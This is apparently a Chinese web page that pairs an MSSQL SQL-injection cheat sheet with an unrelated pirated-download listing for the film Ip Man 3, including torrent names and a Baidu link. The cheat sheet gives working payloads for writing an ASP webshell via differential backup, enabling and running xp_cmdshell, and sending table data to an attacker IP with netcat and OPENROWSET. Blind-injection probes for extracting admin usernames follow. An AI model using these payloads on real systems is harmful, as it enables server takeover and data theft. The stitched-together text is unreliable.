0.dump transaction 数据库名 with no_log 清空日志
1、create table [dbo].[jm_tmp] ([cmd] [image])-- 创建一个表
2、 declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0X6A006D00640063007700 backup database @a to disk = @s --备份数据库,@s为备份名称(jmdcw的16进制转换)
3、insert into [jm_tmp](cmd) values(0x3C2565786563757465287265717565737428226C222929253E)--将一句话木马 "<%execute(request("l"))%>"的16进制字符插入到表中
4、declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=’C:Program FilesCommon FilesMicrosoft SharedWeb Server Extensions40isapihsqq.asp’ backup database @a to disk = @s WITH DIFFERENTIAL,FORMAT --对数据库实行差异备份,备份的保存路径暂定为C盘目录,文件名为hsqq.asp。
5、drop table [jm_tmp]-- 删除此表。
---------------------------------------------------防--------------------------------------------
Function SafeRequest(ParaName,ParaType)
’--- 传入参数 ---
’ParaName:参数名称-字符型
’ParaType:参数类型-数字型(1表示以上参数是数字,0表示以上参数为字符)
Dim Paravalue
Paravalue=Request(ParaName)
If ParaType=1 then
If not isNumeric(Paravalue) then
Response.write "参数" & ParaName & "必须为数字型!"
Response.end
End if
Else
Paravalue=replace(Paravalue,"’","’’")
End if
SafeRequest=Paravalue
End function
-- 绕过单引号继续注入
URL;declare @cmd sysname select @cmd=这里为你要执行命令的16进制 exec master.dbo.xp_cmdshell @cmd;--
--先声明一个变量cmd,然后把我们的指令赋值给cmd
--sql server 2005下开启xp_cmdshell的办法
EXEC sp_configure ’show advanced options’, 1;RECONFIGURE;EXEC sp_configure ’xp_cmdshell’, 1;RECONFIGURE;
--SQL2005开启’OPENROWSET’支持的方法:
exec sp_configure ’show advanced options’, 1;RECONFIGURE;exec sp_configure ’Ad Hoc Distributed Queries’,1;RECONFIGURE;
--SQL2005开启’sp_oacreate’支持的方法:
exec sp_configure ’show advanced options’, 1;RECONFIGURE;exec sp_configure ’Ole Automation Procedures’,1;RECONFIGURE;
在db权限并且分离获取mssql数据库服务器ip的方法
1.本地nc监听 nc -vvlp 80
2.;insert into OPENROWSET(’SQLOLEDB’,’uid=sa;pwd=xxx;Network=DBMSSOCN;Address=你的ip,80;’, ’select * from dest_table’) select * from src_table;--
---------------------------------以下为检测方法---------------------------------
--检测可否注入
=============================================================================
URL and 1=1;--正常页面
URL and 1=2;--出错页面
=============================================================================
--检测数据库的
=============================================================================
URL and (select count(*) from sysobjects)>0;--返回正常sql server
URL and (select count(*) from msysobjects)>0;--返回正常Access
=============================================================================
--检测路径的
=============================================================================
URL and (select count(*) from master.dbo.sysdatabases where name>0 and dbid=6)>0;--
=============================================================================
--检测表段的
=============================================================================
URL and exists (select * from admin);--
=============================================================================
--检测字段的
=============================================================================
URL and exists (select username from admin) ;--
=============================================================================
--检测ID
=============================================================================
URL and exists (select id from admin where ID=1) ;--
=============================================================================
--检测长度的
=============================================================================
URL and exists (select id from admin where len(username)=5 and ID=1);--
=============================================================================
--检测是否为MSSQL数据库
=============================================================================
URL and exists (select * from sysobjects) ;--
=============================================================================
--检测是否为英文 ;--
=============================================================================
URL and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1);-- ACCESS数据库
URL and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1) ;--MSSQL数据库
=============================================================================
--检测英文的范围
=============================================================================
URL and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1);--ACCESS数据库
URL and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1);--MSSQL数据库
=============================================================================
--检测那个字符
=============================================================================
URL and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1);--ACCESS数据库
URL and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1);--MSSQL数据库

◎译 名 YipMan3
◎片 名 叶问3
◎年 代 2015
◎国 家 中国大陆/香港
◎类 别 剧情/传记/动作/历史
◎语 言 汉语普通话/粤语/英语
◎上映日期 2015-12-24(香港)/2016-03-04(中国大陆)
◎IMDb评分 7.9/10 from 4,137 users
◎IMDb链接 http://www.imdb.com/title/tt2888046/
◎豆瓣评分 6.7/10 from 22,092 users
◎豆瓣链接 http://movie.douban.com/subject/11598977/
◎片 长 105分钟
◎导 演 叶伟信 Wilson Yip
◎主 演 甄子丹 Donnie Yen
迈克·泰森 Mike Tyson
张晋 Jin Zhang
熊黛林 Lynn Hung
谭耀文 Patrick Tam
吴千语 Karena Ng
喻亢 Kang Yu
郑则仕 Kent Cheng
梁家仁 Ka-Yan Leung
张继聪 Louis Cheung
陈国坤 Kwok-Kwan Chan
◎简 介
1959年,叶问(甄子丹 饰)与张永成(熊黛林 饰)将大儿子叶准送回广东,小儿子叶正继续在香港读书。在与马鲸笙(谭耀文 饰)与其老板(泰森 饰)所带领的帮派抗争的过程中,叶问带领着自己的弟子保卫了小学,并结识了依靠拉车和在地下赌场斗武为生的张天志(张晋 饰),二 人惺惺相惜。然而 此时,自称 “咏春正宗” 的张天志却向叶问公开宣战,要为自己新开的武馆争取名誉。可是张永成突然病危,让叶问不得不肩负起照顾妻儿的责任。面对家庭和武术,叶问究竟会作何选择?他是否会应战张天志,夺回属于他 “咏春正宗” 的头衔?
◎获奖情况
第35届香港电影金像奖 (2016)
最佳电影(提名)
最佳导演(提名) 叶伟信
最佳男配角(提名) 张晋
最佳摄影(提名)
最佳剪接(提名)
最佳动作设计(提名)
最佳音响效果(提名)
最佳视觉效果(提名)
Title........: Yip Man 3 (2015)
Release Group: BMDru
Ripper ......: chinyan
Release Date : 03/13/2016
HD Source....: Ip Man 3 2015 Blu-ray 1080p AVC DTSX 7.1-MTeam
Video Format : x264
Video Bitrate: 3181KBit/s
Aspect Ratio : 2.353:1
Resolution ..: 1280 x 544
Audio Format : AC3
Audio Bitrate: 640 kb/s
BD Length ...: 1:44:41 (h:m:s)
Frame Rate ..: 24 fps
Language.....: Mandarin / Cantonese
Subtitle(s) .: N / A
Film Genre...: Action, Biography, Drama
File Size ...: 3.25 GB
IMDB Rating..: 7.7/10 from 5,785 users
http://www.imdb.com/title/tt2888046/Encoding settings : ref=16 / subme=11 / Bbframes=16 me=umh / me_range=48
x264 [info]: profile High, level 5.0
x264 [info]: frame I:2301 Avg QP:19.76 size: 73777
x264 [info]: frame P:69520 Avg QP:20.20 size: 28206
x264 [info]: frame B:78933 Avg QP:23.77 size: 4570
x264 [info]: consecutive B-frames: 20.4% 29.7% 13.2% 16.1% 16.3% 3.6% 0.2% 0.0% 0.0% 0.0% 0.0% 0.0% 0.0% 0.0% 0.0% 0.0% 0.3%
encoded 150754 frames, 3.44 fps, 3172.97 kb/s

链接:http://pan.baidu.com/s/1pKye4Uf 密码:mn45
叶问3种子文件1.4G:Ip.Man.3.2015.720p.BluRay.x264.AAC-Tvboxnow.torrent
叶问3种子文件2.5G: 叶问3Ip.Man.3.2015.720p.BluRay.x264-WiKi.torrent
由于是种子文件,不能直接上传,所以改为TXT上传。
将文件重命名为种子文件后缀名即可。视频解压密码:blog.xiaohack.org/yewen3